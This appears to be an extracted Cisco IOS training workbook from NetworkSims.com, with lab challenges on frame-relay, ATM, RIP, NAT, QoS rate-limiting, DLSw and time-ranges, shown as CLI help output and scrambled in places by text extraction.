> enable
# config t
(config)# frame-relay ?
address
Address Registration with neighbor
de-list
Build a classification list to be used in setting the DE bit
switching enable frame relay pvc switching
(config)# frame-relay switching
(config)# int s0
atm-dxi
NetworkSims.com
1005
hdlc
lapb
LAPB (X.25 Level 2)
ppp
smds
x25
X.25
accounting
address-reg
broadcast-queue
class
de-group
fragment
fragmentation
ifmib-counter64
interface-dlci
interface-queue
intf-type
inverse-arp
ip
lmi-n391dte
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
lmi-n393dte
lmi-t392dce
lmi-type
local-dlci
map
multicast-dlci
policing
priority-dlci-group
qos-autosense
route
traffic-shaping
traps-maximum
(config-if)# frame-relay route ?
<16-1007> input dlci to be switched
(config-if)# frame-relay route 100 ?
interface outgoing interface for pvc switching
(config-if)# frame-relay route 100 i ?
Serial Serial
(config-if)# frame-relay route 100 interface s1 ?
<16-1007> output dlci to use when switching
(config-if)# exit
(config)# exit
To show the configuration of the PVC:

# show frame-relay pvc
PVC Statistics for interface Serial0 (Frame Relay DCE)
NetworkSims.com
1006
Local
Switched
Unused
Active
0
0
0
Inactive
0
1
0
Deleted
0
0
0
Static
0
0
0
DLCI = 100, DLCI USAGE = SWITCHED, PVC STATUS = ACTIVE, INTERFACE = Serial0
input pkts 0
out bytes 0
in BECN pkts 0
in DE pkts 0
out bcast pkts 0
output pkts 0
dropped pkts 0
out FECN pkts 0
out DE pkts 0
out bcast bytes 0
in bytes 0
in FECN pkts 0
out BECN pkts 0
Num Pkts Switched 0
pvc create time 00:01:50, last time pvc status changed 00:01:50
PVC Statistics for interface Serial1 (Frame Relay DCE)
Local
Switched
Unused
Active
0
0
0
Inactive
0
1
0
Deleted
0
0
0
Static
0
0
0
DLCI = 101, DLCI USAGE = SWITCHED, PVC STATUS = ACTIVE, INTERFACE = Serial0
input pkts 0
out bytes 0
in BECN pkts 0
in DE pkts 0
out bcast pkts 0
output pkts 0
dropped pkts 0
out FECN pkts 0
out DE pkts 0
out bcast bytes 0
in bytes 0
in FECN pkts 0
out BECN pkts 0
Num Pkts Switched 0
pvc create time 00:01:11, last time pvc status changed 00:01:11
To show the mapping of the DLCIs:

# show frame-relay route
Input Intf
Input Dlci
Serial0
100
Serial1
101
Output Intf
Serial1
Serial0
Output Dlci
101
100
Status
active
active

Outline
This challenge involves the configuration of a sub-interface on a frame-relay connection for
a point-to-point link.
Objectives
Define frame-relay switching for point-to-point connections.

Define frame-relay parameters for S0 and S1 for sub-interface.
Outline
NetworkSims.com
1007
> enable
# config t
(config)# int s0
(config-if)# no frame-replay inverse-arp
(config-if)# exit
(config)# int s0.100 point-to-point
(config-subif)# ip address 10.0.0.1 255.255.255.0
(config-subif)# frame-relay interface-dlci 101
Example
> enable
# config t
(config)# int s0
(config-if)# no frame-relay ?
broadcast-queue
class
de-group
interface-dlci
intf-type
inverse-arp
ip
lmi-n391dte
lmi-n392dce
LMI error threshold
lmi-n392dte
LMI error threshold
lmi-n393dce
lmi-n393dte
lmi-t392dce
lmi-type
local-dlci
map
multicast-dlci
priority-dlci-group Define a priority group of DLCIs
qos-autosense
route
traffic-shaping
traps-maximum
(config-if)# no frame-replay inverse-arp ?
<cr>
bridge
Bridging
interval Set inarp time interval on an interface
ip
IP
qllc
qllc protocol
(config-if)# exit
(config)# int s0.100 ?
multipoint
Treat as a multipoint link
point-to-point Treat as a point-to-point link
(config-subif)# ?
apollo
NetworkSims.com
1008
appletalk
arp
backup
bandwidth
bridge-group
cdp
clns
crypto
decnet
default
delay
description
dlsw
DLSw Interface Subcommands
dspu
Down Stream PU
dxi
exit
frame-relay
Set frame relay parameters
fras
ip
ipv6
ipx
isis
IS-IS commands
iso-igrp
lat
LAT commands
llc2
map-group
mls
mpls
mtu
netbios
Use a defined NETBIOS access list or enable name-caching
no
ntp
Configure NTP
pulse-time
rate-limit
Rate Limit
shutdown
smds
smrp
Simple Multicast Routing Protocol interface subcommands
sna
snapshot
tag-switching
tarp
timeout
traffic-shape
Enable Traffic Shaping on an Interface or Sub-Interface
vines
xns
(config-subif)# frame-relay ?
class
de-group
interface-dlci
inverse-arp
ip
map
(config-subif)# frame-relay interface-dlci ?
<16-1007> Define a switched or locally terminated DLCI
NetworkSims.com
1009
Which assigns the DLCI of 101 to the frame-relay interface.

Outline
This challenge involves the configuration of Voice over Frame-relay (VoFR).
Objectives
Define frame-relay switching for point-to-point connections.

Define a map-class.
Define Cisco encapsulation for VoFR.
Outline
> enable
# config t
(config)# int s0
(config-if)# exit
(config-fr-dlci)# class voipmap
(config-fr-dlci)# vofr cisco
(config-fr-dlci)# exit
(config-if)# exit
(config)# map-class frame-relay voipmap
(config-map-class)# frame-relay fair-queue
(config-map-class)# frame-relay voice bandwidth 64000
(config-map-class)# frame-relay fragment
Example
> enable
# config t
(config)# int s0
(config-if)# exit
(config-fr-dlci)# ?
NetworkSims.com
1010
Frame Relay dlci configuration commands:

auto
Configure Automation
class
Assign a mapclass to a dlci
default
exit
Exit from FR dlci configuration mode
load-interval Specify interval for load calculation for a dlci
no
vofr
Voice over Frame-Relay
x25-profile
Assign an X.25 profile to a dlci (Annex G Service)
<cr>
(config-fr-dlci)# class ?
WORD map class name
(config-fr-dlci)# class voipmap
(config-fr-dlci)# vofr ?
call-control call-control sub-channel
cisco
Cisco encapsulation
data
data sub-channel
<cr>
(config-fr-dlci)# vofr cisco ?
<4-255> cid for vofr call-control
<cr>
(config-fr-dlci)# vofr cisco
(config)# map-class ?
atm
Asynchronous transfer mode
dialer
Dial on Demand
frame-relay Frame Relay
(config)# map-class frame-relay ?
WORD
Static map class name
(config)# map-class frame-relay voipmap

(config-map-class)# ?
Static maps class configuration commands:
default
exit-class
Exit from static map class configuration mode
frame-relay
Configure Map parameters
help
no
service-policy class-based service policy
(config-map-class)# frame-relay ?
adaptive-shaping
Adaptive traffic rate adjustment, Default = none
bc
Committed burst size (Bc), Default = 7000 bits
be
Excess burst size (Be), Default = 0 bits
cir
Committed Information Rate (CIR), Default = 56000 bps
congestion
Congestion management parameters
custom-queue-list VC custom queueing
end-to-end
Configure frame-relay end-to-end VC parameters
fair-queue
VC fair queueing
fecn-adapt
fragment
fragmentation - Requires Frame Relay traffic-shaping to be
configured at the interface level
holdq
Hold queue size for VC
idle-timer
Idle timeout for a SVC, Default = 120 sec
interface-queue
PVC interface queue parameters
ip
mincir
Minimum acceptable CIR, Default = CIR/2 bps
priority-group
VC priority queueing
tc
Policing Measurement Interval (Tc)
traffic-rate
VC traffic rate
voice
voice options
NetworkSims.com
1011
(config-map-class)# frame-relay fair-queue

(config-map-class)# frame-relay voice bandwidth 64000
(config-map-class)# frame-relay fragment

Outline
This challenge involves the configuration of a sub-interface on a frame-relay connection for
a multpoint link (that is, a connection to more than one frame relay connection).
Objectives
Define frame-relay switching for multipoint connections.

Outline
> enable
# config t
(config)# int s0
(config-if)# no frame-relay inverse-arp
(config-if)# exit
(config)# int s0.100 multipoint
(config-subif)# no ip split-horizon
(config-subif)# frame-relay map ip 10.1.1.1 100 broadcast
Example
> enable
# config t
(config)# int s0
(config-if)# exit
(config)# int s0.100 ?
multipoint
(config)# int s0.100 multipoint
(config-subif)# frame-relay ?
class
NetworkSims.com
1012
de-group
interface-dlci
inverse-arp
ip
map
(config-subif)# frame-relay map ?
apollo
Apollo Domain
appletalk AppleTalk
bridge
Bridging
bstun
Block Serial Tunnel
clns
ISO CLNS
decnet
DECnet
dlsw
Data Link Switching
ip
IP
ipv6
IPV6
ipx
Novell IPX
llc2
llc2
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
stun
Serial Tunnel
vines
Banyan VINES
xns
Xerox Network Services
(config-subif)# frame-relay map ip ?
(config-subif)# frame-relay map ip 10.1.1.1 ?
<16-1007> DLCI
(config-subif)# frame-relay map ip 10.1.1.1 ANY ?
broadcast
cisco
compress
ietf
nocompress
rtp
tcp
<cr>
Router(config-subif)# no ?
apollo
appletalk
arp
backup
bandwidth
bridge-group
cdp
clns
crypto
decnet
delay
description
dlsw
DLSw Interface Subcommands
dspu
Down Stream PU
dxi
frame-relay
Set frame relay parameters
fras
ip
NetworkSims.com
1013
ipv6
ipx
isis
iso-igrp
lat
llc2
map-group
mls
mpls
mtu
netbios
ntp
pulse-time
rate-limit
service-policy
shutdown
smds
smrp
sna
snapshot
tag-switching
tarp
timeout
traffic-shape
vines
xns

IS-IS commands
LAT commands
Configure NTP
Rate Limit
(config-subif)# no ip ?
access-group
accounting
address
authentication
bandwidth-percent
bgp
broadcast-address
cef
cgmp
Enable/disable CGMP
dvmrp
hello-interval
helper-address
hold-time
igmp
irdp
load-sharing
mask-reply
mobile
Mobile IP support
mrm
mroute-cache
mtu
multicast
nat
nhrp
ospf
pgm
pim
policy
probe
proxy-arp
Enable proxy ARP
rarp-server
redirects
rgmp
Enable/disable RGMP
NetworkSims.com
1014
rip
route-cache
router
rsvp
sap
security
split-horizon
summary-address
unnumbered
unreachables
urd
verify
vrf
wccp

(config-subif)# no ip split-horizon ?
<cr>
In this case inverse-arp is disabled, thus a frame-relay map statements are required to map the IP
addresses to the DLCI. It is good practice to disable inverse ARP, so that the devices do not learn
incorrect details.

Outline
This challenge involves the configuration of the ATM interface using a sub-interface. This is
the latest method of defining the PVC.
Objectives
Define ATM details.

Create an ATM subinterface.
Define PVC details within subinterface.
Outline
> enable
# config t
(config)# int atm0
(config-if)# no atm ilmi-keepalive
(config-if)# exit
(config)# int atm0.100
(config-subif)# pvc 0/99
(config-if-atm-vc)# protocol ip 10.1.1.2 broadcast
NetworkSims.com
1015
Example
(config)# int atm0
(config-if)# ?
access-expression
apollo
appletalk
arp
atm
backup
bandwidth
bridge-group
carrier-delay
cdp
class-int
clns
crypto
custom-queue-list
decnet
default
delay
description
dspu
Down Stream PU
exit
fair-queue
fras
help
hold-queue
ip
ipv6
ipx
isis
IS-IS commands
iso-igrp
lan-name
LAN Name command
lane
lat
LAT commands
llc2
load-interval
interface
locaddr-priority
logging
loopback
mac-address
map-group
mls
mpls
mpoa
mtu
multilink-group
multiring
netbios
name-caching
no
ntp
Configure NTP
priority-group
pvc
random-detect
Interface
rate-limit
Rate Limit
sap-priority
NetworkSims.com
1016
service-policy
shutdown
smrp
sna
snapshot
snmp
source-bridge
squelch
sscop
standby
svc
tag-switching
tarp
timeout
traffic-shape
transmit-interface
vines
xns
(config-if)# no ?
access-expression
apollo
appletalk
arp
atm
backup
bandwidth
bridge-group
carrier-delay
cdp
class-int
clns
crypto
custom-queue-list
decnet
delay
description
dspu
fair-queue
fras
hold-queue
ip
ipv6
ipx
isis
iso-igrp
lan-name
lane
lat
llc2
load-interval
locaddr-priority
logging
loopback
mac-address
map-group
mls
mpls
mpoa
NetworkSims.com

subcommands
Sub-Interface
interface
Down Stream PU
IS-IS commands
LAN Name command
LAT commands
interface
1017
mtu
multilink-group
multiring
netbios
ntp
priority-group
pvc
random-detect
rate-limit
sap-priority
service-policy
shutdown
smrp
sna
snapshot
snmp
source-bridge
squelch
sscop
standby
svc
tag-switching
tarp
timeout
traffic-shape
transmit-interface
vines
xns
(config-if)# no atm ?
address-registration
arp-server
auto-configuration
class
classic-ip-extensions
clock
e164
esi-address
idle-timeout
ilmi-enable
ilmi-keepalive
ilmi-pvc-discovery
multicast
multipoint-interval

name-caching
Configure NTP
Interface
Rate Limit
subcommands
Sub-Interface
interface
Address Registration
Configure IP ARP Server
ATM interface auto configuration
Configure default map class name
Specify the type of Classic IP extensions
ATM TX clock source
E164 Configuration
7-octet ATM ESI address
Set idle time before disconnecting a SVC
ILMI Configuration
Keepalive polling configuration
Enable ILMI PVC Discovery
E.164 ATM SMDS address
Set minimum interval between multipoint party
additions
multipoint-signalling Multipoint Signalling
nsap-address
20-octet ATM NSAP address
oversubscribe
Allow oversubscription of ATM link
pvc
Create a PVC
rate-queue
ATM Rate Queue
smds-address
E.164 ATM SMDS address
sonet
ATM SONET mode
uni-version
UNI Version
vc-per-vp
ATM VCIs per VPI
(config-if)# no atm ilmi-keepalive ?
<1-65535> seconds
<cr>
(config-if)# no atm ilmi-keepalive
(config-if)# no ip address ?
NetworkSims.com
1018
A.B.C.D IP address
<cr>
(config-if)# exit
(config)# int atm0.101 ?
mpls
Treat as an MPLS link
multipoint
tag-switching
Treat as a tag switching link (obsolete, use mpls)
Router(config-subif)# ?
apollo
appletalk
arp
atm
backup
bandwidth
bridge-group
cdp
class-int
clns
crypto
decnet
default
delay
description
dspu
Down Stream PU
exit
fras
ip
ipv6
ipx
isis
IS-IS commands
iso-igrp
lane
lat
LAT commands
llc2
map-group
mls
mpls
mtu
multiring
netbios
no
ntp
Configure NTP
pvc
rate-limit
Rate Limit
shutdown
smrp
sna
snapshot
source-bridge
sscop
standby
svc
tag-switching
tarp
timeout
traffic-shape
vines
xns
NetworkSims.com
1019

(config-subif)# pvc ?
<0-7>
WORD
(config-subif)# pvc 0/99 ?
smds Configure ATM SMDS PVC parameters
<cr>
atm
atm pvc commands
broadcast
Pseudo-broadcast
class-vc
default
dialer
exit-vc
ilmi
inarp
no
oam
oam-pvc
pppoe-client
pppoe client
protocol
ubr
ubr+
vbr-nrt
vcci
VCC Identifier
Router(config-if-atm-vc)# pro ?
A.B.C.D
Protocol specific address
aarp
AppleTalk ARP
apollo
Apollo Domain
appletalk
AppleTalk
arp
IP ARP
bridge
Bridging
bstun
Block Serial Tunnel
cdp
clns
ISO CLNS
clns_es
ISO CLNS End System
clns_is
cmns
ISO CMNS
compressedtcp
Compressed TCP
decnet
DECnet
decnet_node
DECnet Node
decnet_prime_router DECnet Prime Router
decnet_router-l1
DECnet Router L1
decnet_router-l2
DECnet Router L2
dlsw
Data Link Switching
ip
IP
ipv6
IPV6
ipx
Novell IPX
llc2
llc2
pad
PAD links
ppp
LLC PPP over AAL5 Encapsulation
pppoe
PPP over Ethernet
qllc
qllc protocol
rsrb
snapshot
stun
Serial Tunnel
vines
Banyan VINES
xns
Xerox Network Services
NetworkSims.com
1020
(config-if-atm-vc)# pro ip ?
inarp
Use inarp on this protocol
(config-if-atm-vc)# pro ip 10.1.1.2 ?
broadcast Pseudo-broadcast
no
Prevent Pseudo-broadcast on this connection
<cr>
(config-if-atm-vc)# protocol ip 10.1.1.2 broad ?
<cr>
(config-if-atm-vc)# protocol ip 10.1.1.2 broad ?
(config-if-atm-vc)# encap ?
aal5mux
aal5nlpid
aal5snap
(config-if-atm-vc)# encap aal5snap
(config-if)# exit
Router# sh atm ?
arp-server
class-links
ilmi-configuration
ilmi-status
interface
map
pvc
route
signalling
svc
traffic
vc
vp
ATM ARP Server Table

ATM vc-class links
Display Top level ILMI
Display ATM Interface ILMI information
Interfaces and ATM information
ATM static mapping
ATM PVC information
ATM route
ATM Signalling commands
ATM SVC information
ATM statistics
ATM VC information
ATM VP information
# sh atm map
Map list ATM0.101pvc1 : PERMANENT
ip 1.1.1.1 maps to VC 1, VPI 0, VCI 99, ATM0.101
, broadcast
# sh atm pvc
Interface
0.101
VCD /
Name
VPI
VCI
Type
Encaps
SC
Peak
Kbps
Avg/Min Burst
Kbps
Cells
Sts
# sh atm tr
0 Input packets
0 Output packets
0 Broadcast packets
0 Packets received on non-existent VC
0 Packets attempted to send on non-existent VC
0 OAM cells received
F5 InEndloop: 0, F5 InSegloop: 0, F5 InAIS: 0, F5 InRDI: 0
F4 InEndloop: 0, F4 InSegloop: 0, F4 InAIS: 0, F4 InRDI: 0
0 OAM cells sent
F5 OutEndloop: 0, F5 OutSegloop: 0,
F5 OutRDI: 0
F4 OutEndloop: 0, F4 OutSegloop: 0,
F4 OutRDI: 0
0 OAM cell drops
# sh atm vc
VC not configured on interface ATM0
0.101
1
0
99
PVC
NetworkSims.com
SNAP
UBR
INAC
1021
# sh atm vp
Interface
VPI
Data
VCs
CES
VCs
Peak
Kbps
CES
Kbps
Status

Outline
This challenge involves advertising an interface so that only the next router can find a route
to it. For this an offset of 14 is added to a local interface, so that the next router will have a
metric of 15, and then devices next to this will have a Not Available (as a hop count of 16
with RIP means infinity).
Objectives
Define loopback interface.

Define an offset of 14 for the route to the interface.
Define networks to advertise.
Define the network to offset with an access-list
Outline
(config-if)# exit
(config-router)# offset-list 1 out 14 fa0/1
Example
(config-if)# exit
(config-router)# offset-list ?
<0-99>
Access list of networks to apply offset (0 selects all networks)
<1300-1999> Access list of networks to apply offset (expanded range)
WORD
Access-list name
(config-router)# offset-list 1 ?
in
Perform offset on incoming updates
out Perform offset on outgoing updates
NetworkSims.com
1022
(config-router)# offset-list 1 out ?

<0-16> Offset
(config-router)# offset-list 1 out 14 ?
Async
Async interface
BVI
CTunnel
CTunnel interface
Dialer
Dialer interface
FastEthernet
Loopback
Loopback interface
MFR
Multilink
Null
Null interface
Serial
Serial
Tunnel
Tunnel interface
Vif
Virtual-Template
<cr>
(config-router)# offset-list 1 out 14 fa0/1 ?
<cr>
(config-router)# offset-list 1 out 14 fa0/1
Thus the next router will receive a hop metric of 14 for the loopback interface, and any
further routers will receive a metric of 15, which defines that it is unreachable.

Outline
This challenge involves converting an RIP multicast into a unicast to a specific address.
Normally RIP table are sent through a multicast address of 224.0.0. on UDP port 520.
Objectives
Define E0.
Define conversion for NAT to detect an RIP multicast and convert it to a unicast
destination address.
Outline
(config)# int e0
(config-if)# exit
(config)# ip nat outside source static udp 60.1.1.2 520 224.0.0.0 520
NetworkSims.com
1023
Which converts a RIP (UDP: 520) multicast of a destination of 224.0.0.0 to a unicast

destination address of 60.1.1.2 (also on UDP port: 520).
Example
(config)# int e0
(config-if)# exit
(config)# ip nat ?
inside
Inside address translation
outside
Outside address translation
pool
Define pool of addresses
service
Special translation for application using non-standard port
translation NAT translation entry configuration
(config)# ip nat o ?
source Source address translation
(config)# ip
list
route-map
static
nat o s
Specify
Specify
Specify
?
access list describing global addresses
route-map
static global->local mapping
(config)# ip nat o s s ?
A.B.C.D Outside global IP address
network Subnet translation
tcp
udp
(config)# ip nat o s s u ?
A.B.C.D Outside global IP address
(config)# ip nat o s s u 60.1.1.2 ?
<1-65535> Global UDP/TCP port
(config)# ip nat o s s u 60.1.1.2 520 ?
A.B.C.D Outside local IP address
(config)# ip nat o s s u 60.1.1.2 520 60.1.1.2 ?
<1-65535> Local UDP/TCP port
(config)# ip nat o s s u 60.1.1.2 520 60.1.1.2 520 ?
add-route
Add a static route for outside local address
extendable Extend this translation when used
no-alias
Do not create an alias for the local address
<cr>
(config)# ip nat outside source static udp 60.1.1.2 520 224.0.0.0 520

Outline
This challenge involves creating a distribution-list, which does not send routing updates on
a specific network range.
NetworkSims.com
1024
Objectives
Define a distribution list.

Define a range of network address to not to send to.
Outline
(config)# int e0
(config-if)# ip address 60.1.1.2 255.255.255.0 secondary
(config-if)# exit
(config-router)# distribution-list 1 out e0
(config-router)# distribution-list 1 out s0
In this case there will be no routing tables sent to the 60.60.60.0 network.
Background
(config)# int e0
(config-if)# ip address 60.1.1.2 255.255.255.0 secondary
(config-if)# exit
(config-router)# distribute-list ?
<1-199>
IP access list number
<1300-2699> IP expanded access list number
WORD
Access-list name
gateway
Filtering incoming updates based on gateway
prefix
Filter prefixes in routing updates
(config-router)# distribute-list 1 ?
in
Filter incoming routing updates
out Filter outgoing routing updates
(config-router)# distribute-list 1 out ?
Async
Async interface
BVI
CDMA-Ix
CDMA Ix interface
CTunnel
CTunnel interface
Dialer
Dialer interface
FastEthernet
Lex
Lex interface
Loopback
Loopback interface
MFR
Multilink
Null
Null interface
Port-channel
Tunnel
Tunnel interface
Vif
Virtual-PPP
Virtual-Template
<cr>
(config-router)# distribution-list 1 out e0
NetworkSims.com
1025
(config-router)# distribution-list 1 out s0


Outline
This challenge involves creating a rate-limit for QoS.
Objectives
Define an interface rate limit.

Define an access-list for a rate-limit.
Outline
(config)# int e0
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit
exceed-action drop
(config-if)# exit
(config)# access-list rate-limit 20 mask A2
Background
<1-99>
<100-199>
<1100-1199>
<1300-1999>
<200-299>
<2000-2699>
<700-799>
rate-limit
(config)# access-list rate-limit ?
<1-99>
Precedence ACL index
<100-199> MAC address ACL index
(config)# access-list rate-limit 20 ?
<0-7> Precedence
mask
Use precedence bitmask
(config)# access-list rate-limit 20 mask ?
<0-FF> Precedence bit mask
(config)# access-list rate-limit 20 mask A2 ?
<cr>
(config)# access-list rate-limit 20 mask A2
NetworkSims.com
1026
(config)# int e0
(config-if)# rate-limit-limit ?
input
Rate limit on input
output Rate limit on output
(config-if)# rate-limit in ?
<8000-2000000000> Bits per second
access-group
Match access list
qos-group
Match qos-group ID
(config-if)# rate-limit input access-group ?
<1-2699>
Access list index
rate-limit Match rate-limit access list
(config-if)# rate-limit input access-group rate-limit ?
<1-199> Rate-limit access list index
(config-if)# rate-limit input access-group rate-limit 20 ?
<8000-2000000000> Bits per second
(config-if)# rate-limit input access-group rate-limit 20 8000 ?
<1000-512000000> Normal burst bytes
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 ?
<2000-1024000000> Maximum burst bytes
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 ?
conform-action action when rate not exceeded
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform ?
continue
scan other rate limits
drop
drop packet
set-prec-continue rewrite packet precedence, scan other rate limits
set-prec-transmit rewrite packet precedence and send it
set-qos-continue
set qos-group, scan other rate limits
set-qos-transmit
transmit
transmit packet
(config-if)# rate-limit input access-group rate-limit 20 8000 1000 2000 conform transmit ?
exceed-action action when rate exceeded
exceed-action ?
continue
scan other rate limits
drop
drop packet
set-prec-continue rewrite packet precedence, scan other rate limits
set-prec-transmit rewrite packet precedence and send it
set-qos-continue
set qos-group, scan other rate limits
set-qos-transmit
transmit
transmit packet
exceed-action drop ?
<cr>
exceed-action drop ?
For the masrk the precedence values will be:

0 0000 0001
NetworkSims.com
1027
1 0000 0010
2 0000 0100
3 0000 1000
4 0001 0000
5 0010 0000
6 0100 0000
7 1000 0000
Thus to use one ACL to catch IP precedence values of 1, 5 and 7, the values are added
together:
1 0000 0010
5 0010 0000
7 1000 0000
------------------1010 0010
------------------Thus the mask, in hex, will be:
A2 (1010 0010)

Outline
This challenge involves defining Local-area Mobility (LAM), which a router to listen to
foreign ARPs, and add them to its routing table, which can then be sent to neighhouring
devices. It thus supports mobility of hosts to different subnets, which still keeping the same
IP address.
Objectives
Define LAM.
Define redistribution of mobile subnets.
Outline
(config)# int e0
(config-if)# ip mobile arp
NetworkSims.com
1028
(config-if)# exit
(config)# int e1
(config-if)# exit
(config-router)# redistribute mobile subnets
Background
(config)# int e0
(config-if)# ip mobile ?
arp
ARP discovery of mobile hosts
foreign-service
Mobile IP foreign agent service
prefix-length
Include Prefix-Length extension in advertisement
registration-lifetime Time until registration expires
router-service
Mobile router support
(config-if)# ip mobile arp ?
access-group Access list of acceptable mobile hosts
timers
Set keepalive and holdtime timers
<cr>
(config-if)# int e1
(config-if)# exit
bgp
connected
Connected
egp
eigrp
igrp
isis
ISO IS-IS
iso-igrp
IGRP for OSI networks
metric
metric-type OSPF/IS-IS exterior metric type for redistributed routes
mobile
Mobile routes
odr
ospf
rip
route-map
Route map reference
static
Static routes
subnets
tag
<cr>
(config-router)# redistribute mobile ?
metric
route-map
Route map reference
subnets
tag
<cr>
(config-router)# redistribute mobile subnets ?
metric
route-map
Route map reference
subnets
tag
<cr>
NetworkSims.com
1029

Outline
This challenge involves defining Local-area Mobility (LAM), which a router to listen to
foreign ARPs, and add them to its routing table, which can then be sent to neighhouring
devices. It thus supports mobility of hosts to different subnets, which still keeping the same
IP address. It uses an ACL to define the range of hosts to be used for LAM.
Objectives
Define LAM.
Define redistribution of mobile subnets.
Outline
(config)# int e0
(config-if)# ip mobile arp access-group 20
(config-if)# exit
(config)# int e1
(config-if)# exit
Background
(config)# int e0
(config-if)# ip mobile ?
arp
ARP discovery of mobile hosts
foreign-service
Mobile IP foreign agent service
prefix-length
Include Prefix-Length extension in advertisement
registration-lifetime Time until registration expires
router-service
Mobile router support
(config-if)# ip mobile arp ?
access-group Access list of acceptable mobile hosts
timers
Set keepalive and holdtime timers
<cr>
(config-if)# ip mobile arp access-group ?
<1-99> IP standard access list
WORD
Access-list name
NetworkSims.com
1030
(config-if)# ip mobile arp access-group 20 ?

<cr>
(config-if)# ip mobile arp access-group 20 ?
(config-if)# int e1
(config-if)# exit
bgp
connected
Connected
egp
eigrp
igrp
isis
ISO IS-IS
iso-igrp
IGRP for OSI networks
metric
mobile
Mobile routes
odr
ospf
rip
route-map
Route map reference
static
Static routes
subnets
tag
<cr>
(config-router)# redistribute mobile ?
metric
route-map
Route map reference
subnets
tag
<cr>
(config-router)# redistribute mobile subnets ?
metric
route-map
Route map reference
subnets
tag
<cr>

Outline
This challenge involves defining a high priority for IP traffic but a medium priority for
DLSw on a given interface (E0). It is used to define QoS, and focuses on CCIE certification.
Objectives
NetworkSims.com
1031
Define a priority-list.
Apply it on E0.
Define DLSW details.
Outline
(config)# int e0
(config-if)# exit
(config)# priority-list 2 protocol dlsw medium
(config)# priority-list 2 protocol ip high
(config)# dlsw local-peer peer-id 192.168.0.2
(config)# dlsw remote-peer 0 tcp 192.168.0.1
(config)# dlsw bridge-group 1
Background
(config)# int e0
(config-if)# priority-group ?
(config-if)# exit
default
interface
protocol
queue-limit Set queue limits for priority queue
aarp
AppleTalk ARP
appletalk
AppleTalk
arp
IP ARP
bridge
Bridging
bstun
Block Serial Tunnel
cdp
clns
ISO CLNS
clns_es
ISO CLNS End System
clns_is
cmns
ISO CMNS
compressedtcp
Compressed TCP (VJ)
decnet
DECnet
decnet_node
DECnet Node
dlsw
http
HTTP
ip
IP
ipv6
IPV6
ipx
Novell IPX
llc2
llc2
pad
PAD links
pppoe
PPP over Ethernet
NetworkSims.com
1032
qllc
rsrb
snapshot
stun
qllc protocol
Serial Tunnel
(config)# priority-list 2 p dl ?
high
medium
normal
low
(config)# priority-list 2 protocol dlsw medium
high
medium
normal
low
(config)# priority-list 2 protocol ip high
(config)# dlws ?
allroute-netbios
Use All routes Broadcast for NETBIOS Explorers
allroute-sna
Use All routes Broadcast for SNA Explorers
bgroup-list
Configure a transparent bridge group list
bridge-group
DLSw interconnection to transparent bridging
cache-ignore-netbios-datagram Don't cache source mac/name of NetBIOS
datagrams
circuit-keepalives
Configure DLSw+ to generate periodic circuit
keepalives
disable
Disable DLSw without altering the
configuration
explorerQ-depth
Configure depth of DLSw control queues
fast-hpr-support
Enable fast-switched HPR transport
group-cache
Border Peer Caching Options
history-log
Configure DLSw Circuit-History Log Capability
icannotreach
Configure a resource not locally reachable by
this router
icanreach
Configure resources locally reachable by this
router
llc2
Dlsw llc2 options
load-balance
Configure load balancing
local-peer
Configure local peer
mac-addr
Configure a static MAC address - location or
path
max-multiple-rifs
Configure maximum multiple rifs per interface
multicast
Configure DLSw Multicast Capability
netbios-cache-length
Configure NetBIOS name length
netbios-keepalive-filter
Filter NetBIOS session alive packets
netbios-name
Configure a static NetBios name - location or
path
peer-log-changes
print logging message in router log ONLY for
error events
peer-on-demand-defaults
Change peer-on-demand defaults
port-list
Configure a port list
prom-peer-defaults
Change prom-peer-defaults
redundant-rings
Configure redundant ring-list
remote-peer
Configure a remote peer
ring-list
Configure a ring list
rsvp
timer
Configure DLSw timers
tos
Change IP Type Of Service precedence bits
touch-timer
Configure DLSw touch timers
transparent
Configure transparent media options
udp-disable
Disable DLSw UDP unicast feature
(config)# dlsw local- ?
NetworkSims.com
1033
biu-segment
border
cluster
cost
group
init-pacing-window
keepalive
lf
max-pacing-window
passive
peer-id
promiscuous
v2-single-tcp
vrf
<cr>

groups
from this router
(config)# dlsw local- peer ?

A.B.C.D Local Peer IP address
(config)# dlsw localbiu-segment
border
cluster
cost
group
init-pacing-window
keepalive
lf
max-pacing-window
passive
peer-id
promiscuous
v2-single-tcp
vrf
<cr>
peer 192.168.0.2 ?
groups
from this router
(config)# dlsw local-peer peer-id 192.168.0.2

(config)# dlsw remote ?
<0-4095> Remote peer ring group list
(config)# dlsw
frame-relay
fst
interface
tcp
remote 0 ?
Use Frame Relay for remote peer transport
Use fast sequence transport (FST) for remote peer transport
Use a direct interface for remote peer transport
Use TCP for remote peer transport
(config)# dlsw remote 0 tcp ?

A.B.C.D Remote peer IP address
(config)# dlsw remote 0 tcp 192.168.0.1 ?
backup-peer
Configure as a backup to an existing remote peer
bytes-netbios-out Configure netbios bytes output filtering for this peer
circuit-weight
Configure circuit-weight for this peer
cluster
Override cluster-id of remote peer
cost
Cost to Reach this Remote Peer
dest-mac
Exclusive destination mac-addr for remote peer
dmac-output-list
Filter output destination mac addresses
dynamic
Enable dynamic connection for this remote peer
host-netbios-out
Configure netbios host output filtering for this peer
NetworkSims.com
1034
keepalive
Set keepalive interval for this remote peer
lf
Largest Frame Size for this Remote Peer
lsap-output-list
Filter output IEEE 802.5 encapsulated packets
passive
Local peer will not initiate this remote peer connection
priority
Enable prioritization features for this remote peer
rif-passthru
Use rif_passthru for this remote peer
rsvp
tcp-queue-max
Maximum output TCP queue size for this remote peer
timeout
Set retransmission timeout value for this remote peer
v2-single-tcp
use dlsw v2 single tcp peer bringup for this remote peer
<cr>
(config)# dlsw remote-peer 0 tcp 192.168.0.1
(config)# dlsw bridge-group 1

Outline
This challenge involves the definition of a time-range, which can be applied to an accesscontrol list.
Objectives
Define a time-range.
Outline
(config-time-range)# periodic saturday 3:00 to 15:00
Example
(config)# int e0
(config-if)# exit
(config-time-range)# ?
Time range configuration commands:
absolute absolute time and date
exit
Exit from time-range configuration mode
help
Help for time-range configuration commands
no
periodic periodic time and date
NetworkSims.com
1035
(config-time-range)# ab ?
end
ending time and date
start starting time and date
(config-time-range)# periodic ?
Friday
Friday
Monday
Monday
